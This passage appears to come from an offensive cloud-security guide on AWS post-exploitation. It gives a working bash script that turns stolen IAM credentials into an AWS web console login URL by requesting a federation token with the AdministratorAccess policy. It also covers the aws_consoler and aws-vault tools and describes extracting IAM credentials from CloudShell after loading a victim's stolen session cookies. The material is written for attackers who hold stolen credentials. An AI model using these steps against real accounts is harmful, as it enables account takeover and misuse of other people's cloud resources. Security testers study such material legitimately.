If you have managed to obtain some IAM credentials you might be interested on accessing the web console using the following tools.
Note that the the user/role must have the permission sts:GetFederationToken.
Custom script
The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
# Get federated creds (you must indicate a policy or they won't have any perms)## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges## Don't forget to use [--profile <prof_name>] in the first line if you need tooutput=$(awsstsget-federation-token--nameconsoler--policy-arnsarn=arn:aws:iam::aws:policy/AdministratorAccess)if [ $? -ne0 ]; thenecho"The command 'aws sts get-federation-token --name consoler' failed with exit status $status"exit $statusfi# Parse the outputsession_id=$(echo $output |jq-r'.Credentials.AccessKeyId')session_key=$(echo $output |jq-r'.Credentials.SecretAccessKey')session_token=$(echo $output |jq-r'.Credentials.SessionToken')# Construct the JSON credentials stringjson_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpointfederation_endpoint="https://signin.aws.amazon.com/federation"# Make the HTTP request to get the sign-in tokenresp=$(curl-s"$federation_endpoint" \--get \--data-urlencode"Action=getSigninToken" \--data-urlencode"SessionDuration=43200" \--data-urlencode"Session=$json_creds")signin_token=$(echo-n $resp |jq-r'.SigninToken'|tr-d'\n'|jq-sRr@uri)# Give the URL to loginecho -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
cd/tmppython3-mvenvenvsource./env/bin/activatepipinstallaws-consoleraws_consoler [params...] #This will generate a link to login into the console
Ensure the IAM user has sts:GetFederationToken permission, or provide a role to assume.
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a development environment.
aws-vaultlistaws-vaultexecjonsmith--awss3ls# Execute aws cli with jonsmith credsaws-vaultloginjonsmith# Open a browser logged as jonsmith
You can also use aws-vault to obtain an browser console session
From Console to IAM Creds
Originally discovered in this post, If you manage to compromise some access to a web console (maybe you stole cookies and could't access the .aws folder), you can obtain some IAM token credentials for that user through CloudShell.
CloudShell exposes IAM credentials via an undocumented endpoint on port 1338. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.
